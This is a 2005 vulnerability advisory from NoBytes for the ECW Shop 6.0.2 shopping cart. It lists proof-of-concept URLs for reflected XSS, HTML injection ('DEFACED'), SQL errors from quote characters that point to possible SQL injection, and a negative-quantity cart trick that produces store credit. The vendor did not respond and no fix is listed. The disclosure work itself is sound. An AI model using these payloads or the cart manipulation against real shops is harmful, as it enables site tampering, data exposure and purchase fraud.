[NOBYTES.COM: #9] ECW Shop 6.0.2 - Multiple Vulnerabilities
Hello All,
I have discovered a number of remote vulnerabilities in: ECW Shop 6.0.2
Authors Site: http://www.soft4e.com/
ECW Shop is described by its authors as:
ECW-Shop - simple for use featured shopping cart with ability to use Excel
or Access format for database.
+-[Examples:]--------------------------------------------------+
[1]------------------------------------------------------------+
XSS: (This same problem was reported on version 5.5 by David S. Ferreira -
http://www.securityfocus.com/bid/9244)
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
6d90d8e9&key=1&comp=1&min=1&max=><script>var%20xss=31337;alert(xss);</script
>
[2]------------------------------------------------------------+
Information Disclosure & Possible SQL Injection:
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
6d90d8e9&key=1&comp=1&min='&max=1
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
6d90d8e9&key=1&comp=1&min=1&max='
Error:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/search.php on line 109
[3]------------------------------------------------------------+
HTML Injection:
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c3
6d90d8e9&key=1&comp=1&min=1&max=><H1>DEFACED!</H1>
http://www.victim.com/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&i
d=754ce025144839c2abe369c36d90d8e9&key=&ctg=<H1>DEFACED!</H1>&comp=&min=1&ma
x=1
[4]------------------------------------------------------------+
Cart/Order Manipulation:
You can add negative quanity value items to your cart to gain credit.
Example:
Add '-1' of an item with a value of £4.99 Add '1' of an item with a value of
£6.99
Cart Total: £2.00
+-[Notes:]-----------------------------------------------------+
Vulnerabilities found on: 06/08/2005
Author(s) Informed on: 06/08/2005
Author(s) Response: NONE
Author(s) Fix: NONE
JohnC@xxxxxxxxxxx
http://www.NoBytes.com